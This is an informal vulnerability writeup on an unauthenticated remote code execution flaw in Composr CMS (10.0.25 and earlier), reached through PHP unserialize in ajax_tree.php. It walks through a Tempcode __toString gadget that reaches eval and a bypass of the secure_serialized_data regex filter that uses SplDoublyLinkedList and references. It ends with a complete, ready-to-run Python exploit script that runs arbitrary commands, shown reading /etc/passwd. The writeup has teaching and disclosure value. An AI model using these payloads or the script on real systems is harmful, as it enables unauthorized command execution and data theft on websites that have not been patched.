Composr CMS suffers from a remote code execution vulnerability that can be triggered without authentication. The vulnerability arises because of insufficient validation of user-supplied data that is passed to `unserialize` in `/sources/ajax.php`. Versions up to and including 10.0.25 are vulnerable.
This document is an informal writeup that explains the full process of finding and exploiting the vulnerability, including all failed attempts. It was written to give people who are not acquainted with the details of PHP exploitation an understanding of non-trivial deserialization exploits.
PHP exploitation relies heavily on "dangerous" functions. These are functions that can have unwanted side effects if called with user-supplied data as arguments. The most well-known of these are `eval`, `system` and `unserialize`.
Finding dangerous functions is very easy. In the case of Composr CMS, grepping for `unserialize` finds usage of it in several places. We should quickly make sure that these calls can be reached without authentication before going on to the next step.
Now might be a good time to explain why `unserialize` is dangerous. `serialize` allows a programmer to take an (almost) arbitrary PHP value and turn it into a serialized string. For now it is unimportant how that string is built; we will look at the actual serialization mechanism later. This string can then, for example, be stored in a database or transmitted to a user.
When `unserialize` is later called on this string, it will recreate the original PHP value.
The following PHP code demonstrates this:
class User {
public $name;
public $id;
function __construct($name, $id) {
$this->name = $name;
$this->id = $id;
}
};
$value = [new User('Franz', 1), ['hello', 'world', 0]];
$serialized = serialize($value);
echo $serialized;
// a:2:{i:0;O:4:"User":2:{s:4:"name";s:5:"Franz";s:2:"id";i:1;}i:1;a:3:{i:0;s:5:"hello";i:1;s:5:"world";i:2;i:0;}}
// do something here
$unserialized = unserialize($serialized);
var_dump($unserialized);
/*
array(2) {
[0]=>
object(User)#2 (2) {
["name"]=>
string(5) "Franz"
["id"]=>
int(1)
}
[1]=>
array(3) {
[0]=>
string(5) "hello"
[1]=>
string(5) "world"
[2]=>
int(0)
}
}
*/
There are two big reasons why deserializing a user-supplied string is a bad idea:
Firstly, you don't have any control over the structure of the deserialized value. Code that uses `unserialize` often assumes that the return value has some kind of structure. For example, code might assume that the deserialized value is an array of integers. Of course, when deserializing a string chosen by an attacker, this assumption can be violated. `unserialize` gives attackers full control not only over the deserialized value but also over its type.
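To make the first point concrete, here is a small Python sketch of the explicit shape check that code would need before it can rely on "an array of integers". It is an illustration only: the function name `parse_int_list` and the use of JSON as the wire format are assumptions made for this example, not something Composr does.

```python
import json

def parse_int_list(raw):
    """Decode untrusted text and accept it only if it is a list of integers."""
    try:
        value = json.loads(raw)
    except ValueError:                 # json.JSONDecodeError is a ValueError
        return None
    if not isinstance(value, list):
        return None
    # bool is a subclass of int in Python, so it is excluded explicitly.
    if not all(isinstance(v, int) and not isinstance(v, bool) for v in value):
        return None
    return value

print(parse_int_list("[1, 2, 3]"))            # accepted
print(parse_int_list('{"only_owned": "x"}'))  # rejected: wrong container type
print(parse_int_list('[1, "2"]'))             # rejected: wrong element type
```

A data-only format such as JSON cannot name classes, so a check like this only has to deal with the first problem described here, not the second.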
As if that wasn't enough, `unserialize` also does something way more dangerous: it has the ability to instantiate objects of all classes that are in the current scope at the time of the `unserialize` call. PHP objects can have special "magic" methods. Magic methods are in most cases not called explicitly by the programmer, but implicitly by PHP itself. A quick overview of the most important magic methods:
method | called when |
---|---|
`__destruct` | object is destroyed (it falls out of scope or the script ends) |
`__wakeup` | object is deserialized |
`__sleep` | object is serialized |
`__toString` | object is used in a context where PHP implicitly converts it into a string |
`__invoke` | object is used as if it were a function |
The following code shows how this can be exploited:
class Cache {
public $file;
public $data;
function __construct($file) {
$this->file = $file;
$this->data = "";
}
function addData($data) {
$this->data .= "\n" . $data;
}
function __destruct() {
// quickly save the data!
file_put_contents($this->file, $this->data);
}
}
$user = unserialize($_COOKIE['user']);
Attackers can exploit this code to write arbitrary data to an arbitrary file. They do this by serializing a `Cache` object with `file` and `data` set to values of their choosing. This `Cache` object will then be instantiated when `unserialize` is called, and its `__destruct` method will run once the script finishes executing.
We can now look at Composr CMS again and see if we can find some classes with useful magic methods.
Modern PHP applications often feature many classes that have useful magic methods. PHPGGC is a project that contains a list of classes with interesting magic methods in widespread libraries. It also contains code to automatically generate exploit code.
Composr CMS, however, doesn't use any popular library, so we have to find magic methods ourselves. Grepping for `__destruct` and `__wakeup` doesn't find anything useful. The `Tempcode` class in `/sources/tempcode.php`, however, has a very interesting `__toString` method:
class Tempcode {
// ...
public function __toString() {
return $this->evaluate();
}
// ...
public function evaluate($current_lang = null) {
$tpl_funcs = $KEEP_TPL_FUNCS;
foreach ($this->seq_parts as $seq_parts_group) {
foreach ($seq_parts_group as $seq_part) {
$seq_part_0 = $seq_part[0];
if (!isset($tpl_funcs[$seq_part_0])) {
eval($this->code_to_preexecute[$seq_part_0]);
}
}
}
}
// ...
}
This is a textbook `unserialize` gadget and it is super easy to use, too. Simply create a serialized `Tempcode` object in the following manner:
class Tempcode {
}
$tp = new Tempcode();
$tp->seq_parts = [[["somestring"]]];
$tp->code_to_preexecute["somestring"] = "system(\"ls\");exit();";
echo serialize($tp);
/*
O:8:"Tempcode":2:{s:9:"seq_parts";a:1:{i:0;a:1:{i:0;a:1:{i:0;s:10:"somestring";}}}s:18:"code_to_preexecute";a:1:{s:10:"somestring";s:20:"system("ls");exit();";}}
*/
If we can get Composr CMS to unserialize this string and the resulting object gets (unintentionally) used in a context where the `__toString` method will be called, we can achieve command execution.
We will focus on the `ajax_tree_script` function in `/sources/ajax.php`. This function will run when you access `http://example.org/data/ajax_tree.php`. It is one of the functions that calls `unserialize` on user input without authentication. It starts by quickly checking if the site is in maintenance mode:
function ajax_tree_script()
{
$site_closed = get_option('site_closed');
if (($site_closed == '1') && (!has_privilege(get_member(), 'access_closed_site')) && (!$GLOBALS['IS_ACTUALLY_ADMIN'])) {
header('Content-type: text/plain; charset=' . get_charset());
@exit(get_option('closed'));
}
Then sets some ajax stuff up:
prepare_for_known_ajax_response();
require_code('xml');
header('Content-Type: text/xml');
Loads a hook object that will later run a few database queries and generate the response:
$hook = filter_naughty_harsh(get_param_string('hook'));
require_code('hooks/systems/ajax_tree/' . $hook, true);
$object = object_factory('Hook_' . $hook, true);
if ($object === null) {
warn_exit(do_lang_tempcode('INTERNAL_ERROR'));
}
Gets some further options and outputs the beginning of the response:
$id = get_param_string('id', '', true);
if ($id == '') {
$id = null;
}
safe_ini_set('ocproducts.xss_detect', '0');
$html_mask = get_param_integer('html_mask', 0) == 1;
if (!$html_mask) {
echo '<?xml version="1.0" encoding="' . get_charset() . '"?' . '>';
}
echo($html_mask ? '<html>' : '<request>');
Unserializes user-supplied data (`$_GET['options']` in this case) and stores it in the `$options` variable:
$_options = get_param_string('options', '', true);
if ($_options == '') {
$_options = serialize(array());
}
secure_serialized_data($_options); // Ignore this (for now)
$options = @unserialize($_options);
if ($options === false) {
warn_exit(do_lang_tempcode('INTERNAL_ERROR'));
}
And finally calls the `run` method on the loaded hook object and passes our unserialized input in:
$val = $object->run($id, $options, get_param_string('default', null, true));
echo str_replace('</body>', '<br id="ended" /></body>', $val);
echo($html_mask ? '</html>' : '</request>');
exit();
}
Reading the code, we see that we have control over which hook object is loaded (via the `$_GET['hook']` parameter) and of course we have full control over the `$options` value. All of the hook objects we could use here work basically the same. We'll go with the `Hook_choose_catalogue_entry` class. Here is its `run` method:
public function run($id, $options, $default = null)
{
require_code('catalogues');
$only_owned = array_key_exists('only_owned', $options) ? (is_null($options['only_owned']) ? null : intval($options['only_owned'])) : null;
$catalogue_name = array_key_exists('catalogue_name', $options) ? $options['catalogue_name'] : null;
$editable_filter = array_key_exists('editable_filter', $options) ? ($options['editable_filter']) : false;
$tree = get_catalogue_entries_tree($catalogue_name, $only_owned, is_null($id) ? null : intval($id), null, null, is_null($id) ? 0 : 1, $editable_filter);
/* The rest from here on is unimportant */
This code assumes that `$options` is an array containing strings and integers. It tries to get a few values out of the array and passes them to a function called `get_catalogue_entries_tree`. This function will then execute a SQL query containing the `$catalogue_name` value, thereby implicitly converting it to a string!
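The effect can be reproduced in miniature. The Python sketch below is only an analogy: `__str__` plays the role of PHP's `__toString`, and the class name `Probe`, the table name and the column name are made up for illustration. It shows that merely building a query string out of an object is enough to run the object's conversion method, even though the surrounding code never calls it by name.

```python
class Probe:
    """Stand-in for an attacker-controlled object (hypothetical name)."""

    def __init__(self):
        self.calls = 0

    def __str__(self):
        # Runs implicitly whenever the object is formatted as text.
        self.calls += 1
        return "demo"

options = {"catalogue_name": Probe()}

# Code that expects a plain string simply concatenates the value.
query = "SELECT * FROM entries WHERE c_name='{}'".format(options["catalogue_name"])

print(query)
print(options["catalogue_name"].calls)
```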
This means that we found a way to get the script to call the `__toString` function on our serialized object! The only thing left to do is to build the exploit:
The URL we have to access is `http://example.org/data/ajax_tree.php`. To use the `Hook_choose_catalogue_entry` class we need to set the `hook` parameter to `choose_catalogue_entry`. Now we need to build the serialized `options` parameter. It should be an array that contains our `Tempcode` gadget. Let's fire up PHP to generate it:
class Tempcode {
}
$tp = new Tempcode();
$tp->seq_parts = [[["somestring"]]];
$tp->code_to_preexecute["somestring"] = "system(\"ls\");exit();";
$options = ['catalogue_name' => $tp];
echo serialize($options);
/*
a:1:{s:14:"catalogue_name";O:8:"Tempcode":2:{s:9:"seq_parts";a:1:{i:0;a:1:{i:0;a:1:{i:0;s:10:"somestring";}}}s:18:"code_to_preexecute";a:1:{s:10:"somestring";s:20:"system("ls");exit();";}}}
*/
Our exploit then looks like this:
#!/usr/bin/env python3
import requests
def exploit(base_url):
payload = {'hook': 'choose_catalogue_entry',
'options': 'a:1:{s:14:"catalogue_name";O:8:"Tempcode":2:{s:9:"seq_parts";a:1:{i:0;a:1:{i:0;a:1:{i:0;s:10:"somestring";}}}s:18:"code_to_preexecute";a:1:{s:10:"somestring";s:20:"system("ls");exit();";}}}'}
return requests.get("{}/data/ajax_tree.php".format(base_url), params=payload)
exploit('http://example.org')
Let's execute it and have a look at the output:
$ python3 composr_exploit.py
<?xml version="1.0" encoding="utf-8"?><request>
<!DOCTYPE html>
<html lang="en" dir="ltr">
<head>
...
Well, that doesn't look like `ls` at all...
What we got back was an HTML document telling us that a PHP warning was raised and that execution was stopped. The error message says something about `array_key_exists` expecting an array and not getting one. The reason `array_key_exists` didn't get our deserialized array is that our serialized string has been tampered with! Directly before the call to `unserialize`, another function is called, one that (supposedly) checks the serialized string for dangerous objects: `secure_serialized_data`. It is defined in `/sources/global3.php` and we will soon take a look at what exactly it does. If you plan on exploiting deserialization vulnerabilities, this is a situation you will probably find yourself in more than once. Don't worry: the serialization mechanism PHP uses is quite complicated and many of these handcrafted validation routines are easy to outsmart. To do this we should first familiarize ourselves with the PHP serialization mechanism.
This is how basic types get serialized:
type | serialized | example |
---|---|---|
null | `N;` | `N;` |
boolean | `b:<boolean as integer>;` | `b:1;` |
integer | `i:<number>;` | `i:5;` |
string | `s:<number of characters>:"<string>";` | `s:5:"hello";` |
float | `d:<float>;` | `d:5.4;` |
Note that if a string gets serialized it won't get escaped. So `She said "hello" to me` will get serialized to `s:22:"She said "hello" to me";`.
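The reason unescaped quotes are not ambiguous is the length prefix: a reader never searches for the closing quote, it just takes the announced number of bytes. The following Python sketch (the function name `read_php_string` is made up for this example, and it assumes ASCII input so that characters and bytes coincide) reads one string token that way:

```python
def read_php_string(data, pos=0):
    """Read one s:<len>:"<text>"; token at pos and return (text, next_pos)."""
    if not data.startswith("s:", pos):
        raise ValueError("not a string token")
    colon = data.index(":", pos + 2)
    length = int(data[pos + 2:colon])
    start = colon + 2                       # skip the ':' and the opening quote
    text = data[start:start + length]       # taken by length, quotes included
    if data[start + length:start + length + 2] != '";':
        raise ValueError("length prefix does not match the content")
    return text, start + length + 2

text, next_pos = read_php_string('s:22:"She said "hello" to me";')
print(text)
```

PHP itself counts bytes rather than characters, which only makes a difference for non-ASCII text.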
Now for the more complex types:
Arrays get serialized to `a:<number of elements>:{<list of elements>}` where the `<list of elements>` is just a list of all serialized `<key><element>` pairs. `[0 => "a", 1 => "b", 2 => "c"]` is therefore serialized to `a:3:{i:0;s:1:"a";i:1;s:1:"b";i:2;s:1:"c";}`.
Finally, objects get serialized to `O:<number of characters in the class name>:"<class name>":<number of class members>:{<list of class members>}` where `<list of class members>` is serialized just like array elements (except of course that the keys must be strings here). Here is an example:
class HelloWorld {
public $a;
public $b;
}
$hello = new HelloWorld();
$hello->a = "a";
$hello->b = 1;
echo serialize($hello);
// O:10:"HelloWorld":2:{s:1:"a";s:1:"a";s:1:"b";i:1;}
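The rules above are compact enough to restate as code. The following Python function is a minimal sketch of the format as described in this section, not a reimplementation of PHP's `serialize`: it only covers public members, ignores references, and the name `php_serialize` is chosen for this example.

```python
def php_serialize(value):
    """Serialize a Python value following the format rules described above."""
    if value is None:
        return "N;"
    if isinstance(value, bool):            # must be tested before int
        return "b:%d;" % int(value)
    if isinstance(value, int):
        return "i:%d;" % value
    if isinstance(value, float):
        return "d:%r;" % value
    if isinstance(value, str):
        # Length prefix in bytes, content copied without escaping.
        return 's:%d:"%s";' % (len(value.encode("utf-8")), value)
    if isinstance(value, (list, tuple)):
        value = dict(enumerate(value))     # lists become arrays keyed 0..n-1
    if isinstance(value, dict):
        body = "".join(php_serialize(k) + php_serialize(v) for k, v in value.items())
        return "a:%d:{%s}" % (len(value), body)
    # Anything else is treated as an object whose attributes are public members.
    name = type(value).__name__
    members = vars(value)
    body = "".join(php_serialize(k) + php_serialize(v) for k, v in members.items())
    return 'O:%d:"%s":%d:{%s}' % (len(name), name, len(members), body)

class HelloWorld:
    def __init__(self):
        self.a = "a"
        self.b = 1

print(php_serialize(["a", "b", "c"]))
print(php_serialize(HelloWorld()))
```

Run on the two examples from this section, it reproduces the strings shown above.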
Now that we know about the basic structure of serialized strings, we can take a look at the `secure_serialized_data` function that currently blocks our attempt to gain code execution.
// Cleaned up so it's easier to read
function secure_serialized_data(&$serialized_data)
{
$matches = array();
$num_matches = preg_match_all('#(^|;)O:\d+:"([^"]+)"#', $serialized_data, $matches);
for ($i = 0; $i < $num_matches; $i++) {
$methods = get_class_methods($matches[2][$i]);
foreach ($methods as $method) {
if (preg_match('#^__.*$#', $method) != 0) {
$serialized_data = serialize(null);
return;
}
}
}
}
This function takes our serialized string and uses a regex to search for occurrences of `O:<some number here>:"<class name>"`. It then takes whatever string was at `<class name>` and calls `get_class_methods` on it, iterates over the class methods and, if one of these methods is a magic method, substitutes our `$serialized_data` string with a completely safe replacement.
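For readers who prefer to experiment outside PHP, here is a rough Python port of that logic. It is a sketch under assumptions: `KNOWN_CLASSES` is a hypothetical stand-in for PHP's `get_class_methods`, the method lists in it are abbreviated, and the function returns the result instead of modifying its argument by reference.

```python
import re

# Same pattern as in the PHP code above.
OBJECT_RE = re.compile(r'(^|;)O:\d+:"([^"]+)"')

# Hypothetical stand-in for get_class_methods(): class name -> method names.
KNOWN_CLASSES = {
    "Tempcode": ["evaluate", "__toString"],
    "HelloWorld": [],
}

def secure_serialized_data(serialized):
    """Return the input unchanged, or 'N;' if a matched class has a magic method."""
    for match in OBJECT_RE.finditer(serialized):
        # Unlike PHP, an unknown class name simply yields an empty list here.
        methods = KNOWN_CLASSES.get(match.group(2), [])
        if any(name.startswith("__") for name in methods):
            return "N;"                    # what serialize(null) produces
    return serialized

print(secure_serialized_data('a:1:{i:0;O:10:"HelloWorld":0:{}}'))
print(secure_serialized_data('a:1:{s:14:"catalogue_name";O:8:"Tempcode":0:{}}'))
```

The second call is the situation from the failed attempt above: the array is replaced by a serialized `null`, which is why `array_key_exists` later complains.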
It turns out that PHP's serialization language is context-sensitive (you could actually argue that it's a type-0 grammar), while a regex like this one can only recognize a regular language. This means that there have to be cases where the regex and PHP's `unserialize` disagree on how to understand the input. These disagreements are called parser differentials. Our goal now is to find an input that exploits a parser differential in order to bypass the regex check.
`unserialize` used to allow a superfluous `+` in some places:
O:+10:"HelloWorld":2:{s:1:"a";s:1:"a";s:1:"b";i:1;}
  ^
This makes it possible to completely bypass `secure_serialized_data`. It has one drawback though: it no longer works as of PHP 7.2.
Well, we can serialize arbitrary strings. Having a little fun with that poor regex is almost obligatory:
class HelloWorld {
}
$serialized_data = serialize([";O:2:" => new HelloWorld()]);
echo $serialized_data;
// a:1:{s:5:";O:2:";O:10:"HelloWorld":0:{}}
//           ^           ^
//     match begin       end
//
// And since subsequent matches are continued from
// the end of the last match no further match is found
$matches = array();
$num_matches = preg_match_all('#(^|;)O:\d+:"([^"]+)"#', $serialized_data, $matches);
for ($i = 0; $i < $num_matches; $i++) {
echo $matches[2][$i];
}
The regex now parses `;O:10:` as the class name of an object and, more importantly, it doesn't find our `HelloWorld` object anymore!
This is a classic parser differential that arises because regular languages are just not powerful enough to parse strings serialized with PHP's serialization mechanism.
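The disagreement is easy to observe with any regex engine that scans for non-overlapping matches from left to right. The Python sketch below applies the same pattern to the string from the PHP example and prints where the single match starts and ends; nothing in it is specific to Composr.

```python
import re

OBJECT_RE = re.compile(r'(^|;)O:\d+:"([^"]+)"')
data = 'a:1:{s:5:";O:2:";O:10:"HelloWorld":0:{}}'

matches = list(OBJECT_RE.finditer(data))
for m in matches:
    # start/end are offsets into data; group(2) is the supposed class name
    print(m.start(), m.end(), repr(m.group(2)))
# prints: 10 23 ';O:10:'
```

The match starts inside the array key and swallows the real `O:10:` prefix, so the scan resumes at `HelloWorld"` and finds nothing else.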
Sadly, it's of no use to us, because `secure_serialized_data` will go on to call `get_class_methods` on `;O:10:`, which will return `null`. The following code then tries to iterate over `null`, raising a warning and halting the execution. The thing stopping us here is the (admittedly good) security practice of stopping the execution on PHP warnings.
Now, we want this to work for PHP 7.2 and we're kinda getting desperate. Luckily, it turns out that the serialization format has some features we haven't talked about yet:
- Objects that implement the `Serializable` interface
- References
Classes that implement the `Serializable` interface provide two methods, `serialize` and `unserialize`. When serializing an object of such a class, a string of the following format will be returned: `C:<number of characters in the class name>:"<class name>":<length of the output of the serialize method>:{<output of the serialize method>}`. Creating a serialized string in this format for an object of a class that doesn't implement `Serializable` will work, but the deserialized object will not have any class members set. It is thus not very useful for our purposes, but it does lead the way to a final working exploit.
There are a few PHP classes implementing `Serializable`, the most important of which (for our purposes here) is `SplDoublyLinkedList`. This is the important part of the C code that handles serialization for `SplDoublyLinkedList`:
/* flags */
ZVAL_LONG(&flags, intern->flags);
php_var_serialize(&buf, &flags, &var_hash);
/* elements */
while (current) {
smart_str_appendc(&buf, ':');
next = current->next;
php_var_serialize(&buf, &current->data, &var_hash);
current = next;
}
It shows that the elements of a `SplDoublyLinkedList` are serialized just like `serialize` would serialize them, but they are separated by colons. This provides us with a way to bypass the regex:
class HelloWorld {
}
$dll = new SplDoublyLinkedList();
$dll->push(new HelloWorld());
$dll->push(42);
$serialized_data = serialize($dll);
echo $serialized_data;
// C:19:"SplDoublyLinkedList":33:{i:0;:O:10:"HelloWorld":0:{}:i:42;}
//                                    ^
// This colon prevents the regex from matching
Now this by itself isn't really helpful. `SplDoublyLinkedList` doesn't implement `__toString`, and although array operators work on it, keys have to be numeric, so `$dll['catalogue_name']` doesn't work either. We can now get our gadget deserialized without triggering `secure_serialized_data`, but we need a new way to call `__toString` on it.
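A quick way to confirm that the colon separator is what defeats the check is to run the pattern against both encodings of the same harmless `HelloWorld` object. This Python sketch reuses the regex from `secure_serialized_data`; the two sample strings follow the formats shown above.

```python
import re

OBJECT_RE = re.compile(r'(^|;)O:\d+:"([^"]+)"')

samples = {
    "plain array": 'a:1:{i:0;O:10:"HelloWorld":0:{}}',
    "linked list": 'C:19:"SplDoublyLinkedList":33:{i:0;:O:10:"HelloWorld":0:{}:i:42;}',
}

found = {}
for label, data in samples.items():
    # Collect every class name the regex believes it has seen.
    found[label] = [m.group(2) for m in OBJECT_RE.finditer(data)]
    print(label, found[label])
```

Inside the array the object is preceded by `;` and is reported; inside the list it is preceded by `:` and goes unnoticed.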
There is one last thing about the serialization format we haven't talked about: it allows references. If you serialize the same object (not just a copy) twice, the object won't be serialized two times. Instead, `serialize` will just store a reference. Here's a quick example:
class HelloWorld {
}
$a = new HelloWorld();
$serialized_data = serialize([$a, $a]);
echo $serialized_data;
// a:2:{i:0;O:10:"HelloWorld":0:{}i:1;r:2;}
//                                    ^
// This is the reference
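The number after `r:` counts values in the order they appear in the string, starting at 1 for the outermost value; array keys and member names are not counted. The Python sketch below walks a serialized string and builds that numbering. It is a simplified model for illustration (the name `slot_table` is made up; it handles only `N`, `b`, `i`, `d`, `s`, `a`, `O` and `r`, assumes ASCII, and makes no claim about how values after a reference are numbered).

```python
def slot_table(data):
    """List values in slot order and resolve every r:N to the value it names."""
    slots = []      # slots[n - 1] is what r:n refers to
    refs = []       # slot numbers named by r: entries

    def number(pos):
        # Read an integer ending at ':' or ';' and return (value, next index).
        end = pos
        while data[end] not in ":;":
            end += 1
        return int(data[pos:end]), end + 1

    def members(pos, count):
        # Parse `count` key/value pairs between '{' and '}'.
        pos += 1                                    # skip '{'
        for _ in range(count):
            pos = parse(pos, is_key=True)
            pos = parse(pos)
        return pos + 1                              # skip '}'

    def parse(pos, is_key=False):
        tag = data[pos]
        if tag == "r":
            target, pos = number(pos + 2)
            refs.append(target)
            return pos
        if tag == "a":
            slots.append("array")
            count, pos = number(pos + 2)
            return members(pos, count)
        if tag == "O":
            length, pos = number(pos + 2)           # pos is at the opening quote
            slots.append("object " + data[pos + 1:pos + 1 + length])
            count, pos = number(pos + length + 3)   # skip "name":
            return members(pos, count)
        if tag == "s":
            length, pos = number(pos + 2)
            label, pos = "string", pos + length + 3 # skip "text";
        else:                                       # N;  i:..;  b:..;  d:..;
            end = data.index(";", pos)
            label, pos = data[pos:end], end + 1
        if not is_key:                              # keys do not get a slot
            slots.append(label)
        return pos

    parse(0)
    return slots, [slots[n - 1] for n in refs]

print(slot_table('a:2:{i:0;O:10:"HelloWorld":0:{}i:1;r:2;}'))
# prints: (['array', 'object HelloWorld'], ['object HelloWorld'])
```

Slot 1 is the array itself and slot 2 is the `HelloWorld` object, which is why the second element is written as `r:2;`.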
We can now use this to build a new exploit that bypasses `secure_serialized_data` but still executes our code:
class Tempcode {
}
$tp = new Tempcode();
$tp->seq_parts = [[["somestring"]]];
$tp->code_to_preexecute["somestring"] = "system(\"ls\");exit();";
$dll = new SplDoublyLinkedList();
$dll->push($tp);
$options = [0 => $dll, 'catalogue_name' => $tp];
echo serialize($options);
/*
a:2:{i:0;C:19:"SplDoublyLinkedList":166:{i:0;:O:8:"Tempcode":2:{s:9:"seq_parts";a:1:{i:0;a:1:{i:0;a:1:{i:0;s:10:"somestring";}}}s:18:"code_to_preexecute";a:1:{s:10:"somestring";s:20:"system("ls");exit();";}}}s:14:"catalogue_name";r:4;}
*/
This exploit uses a bit of trickery: the malicious `Tempcode` object is stored in the `SplDoublyLinkedList` to evade detection by the regex, but a reference to this `Tempcode` object is used outside of the `SplDoublyLinkedList`, allowing us to use the discovered vulnerability where `__toString` is called on the array element with the key `catalogue_name`!
Here is the final exploit:
#!/usr/bin/env python3
import requests
import argparse
def exploit(base_url, cmd):
payload = {'hook': 'choose_catalogue_entry', 'cmd': cmd, 'options': 'a:2:{i:0;C:19:"SplDoublyLinkedList":152:{i:0;:O:8:"Tempcode":2:{s:9:"seq_parts";a:1:{i:0;a:1:{i:0;a:1:{i:0;s:0:"";}}}s:18:"code_to_preexecute";a:1:{s:0:"";s:28:"system($_GET["cmd"]);exit();";}}}s:14:"catalogue_name";r:4;}'}
return requests.get("{}/data/ajax_tree.php".format(base_url), params=payload).text[47:]
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Remote code execution on composr cms')
parser.add_argument('url', help='base url of the composr installation')
parser.add_argument('cmd', help='command to execute')
args = parser.parse_args()
print(exploit(args.url, args.cmd))
And one final test:
$ python3 composr_exploit.py http://localhost "cat /etc/passwd"
root:x:0:0:root:/root:/bin/bash
...